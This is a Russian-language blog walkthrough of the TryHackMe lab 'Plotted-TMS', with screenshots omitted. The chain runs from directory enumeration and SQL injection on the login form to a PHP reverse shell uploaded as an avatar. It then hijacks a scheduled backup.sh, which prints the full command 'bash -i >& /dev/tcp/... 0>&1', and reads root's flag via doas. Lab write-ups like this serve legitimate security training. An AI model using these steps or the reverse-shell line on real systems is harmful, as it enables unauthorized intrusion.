Добавить в корзинуПозвонить
Найти в Дзене
TryHackMe: Гид по кибербезопасности | Разборы задач

Решение Plotted‐TMS на TryHackMe

2 мин
1. Разведка nmap 2. Вижу открытые 22, 80 и 445 порты, смотрю что на 80 и 445 портах 3. На обоих портах стартовая страница апач, ищу скрытые директории, начал с 80 порта 4. Проверяю что находится в /admin 5. Очень похоже на base64, расшифровываю 6. Сообщение типа все не так просто иди нафиг.... Смортрю в директории /shadow 7. Проверяю последнюю найденную директорию на порту 80 /passwd, там то же самое сообщение, что и /shadow 8. Теперь ищу директории на порту 445 9. Смотрю что в директории /management 10. На странице всего одна кнопка, ведущая на форму регистрации 11. Продолжаю поиск директори в /management 12. Нашел много директорийй, содержимое которых начал изучать и в одной из директорий /database нашел интересный файл traffic_offense_db.sql, изучая содержимое которого увидел данные логина и пароля 13. Попытался расшифровать пароль и у меня получилось 14. Используя полученные логин и пароль пытаюсь зарегистрироваться на сайте, но ничего не получается 15. Используя BurpSuite решил

1. Разведка nmap

-2

2. Вижу открытые 22, 80 и 445 порты, смотрю что на 80 и 445 портах

-3

3. На обоих портах стартовая страница апач, ищу скрытые директории, начал с 80 порта

-4

4. Проверяю что находится в /admin

-5
-6

5. Очень похоже на base64, расшифровываю

-7

6. Сообщение типа все не так просто иди нафиг.... Смортрю в директории /shadow

-8
-9

7. Проверяю последнюю найденную директорию на порту 80 /passwd, там то же самое сообщение, что и /shadow

8. Теперь ищу директории на порту 445

-10

9. Смотрю что в директории /management

-11

10. На странице всего одна кнопка, ведущая на форму регистрации

-12

11. Продолжаю поиск директори в /management

-13

12. Нашел много директорийй, содержимое которых начал изучать и в одной из директорий /database нашел интересный файл traffic_offense_db.sql, изучая содержимое которого увидел данные логина и пароля

-14

13. Попытался расшифровать пароль и у меня получилось

-15

14. Используя полученные логин и пароль пытаюсь зарегистрироваться на сайте, но ничего не получается

-16

15. Используя BurpSuite решил посмотреть на запрос

-17

16. Решил проверить подвержена ли форма sql инъекции, для этого добавил запрос в интрудер и атакуемым полем выбрал логин, после чего добавил словарь с sql инъекциями и запустил атаку

-18

17. Вижу, что один из запросов отличается по размеру от остальных, пытаюсь вставить в форму логина эту нагрузку

-19

18. Вижу, что я нахожусь под учеткой админа, захожу в MyAccount и вижу, что могу поменять пароль и добавить аватарку профилю. Поэтому решаю попробовать загрузить вместо аватарки файл реверс шелла.

-20

19. Копирую эту нагрузку в файл shell.php, запускаю у себя слушатель, добавляю созданный мною файл вместо аватарки и нажав правой кнопкой по аватарке запускаю файл реверса в новой странице. Страница подвисает реверс получен, проверяю кто я

-21

20. В папке где у меня расположен linpeas.sh подымаю python сервер, на атакуемой машине перехожу в папку /tmp и с поьщщью wget скачиваю туда linpeas.sh, даю ей права на исполнение и запускаю

-22

21. Обнаруживаю кучу CVE, но так не интересно, поэтому посмотрев дальше обнаружил интересный скрипт, запускаемый с правами plot_admin, смотрю что в нем

-23

22. Удаляю этот файл и создаю файл с тем же именем, куда вписываю реверс шелл bash -i >& /dev/tcp/10.23.205.140/1234 0>&1, после этого с помощью chmod +x даю этому файлу права на исполнения и с помощью команды ./backup.sh запускаю этот файл, предварительно запустив слушатель у себя на машине

-24

23. В домашней директории читаю флаг plot_admin

24. Смотрю что я могу делать с SUID-битом

-25

25. Вижу /usr/bin/doas, когда то я сталкивался с этим я знаю, что через doas возможно прочитать содержимое файла минуя root

-26

26. Читаю флаг root и ввожу его в полу, машина решена

-27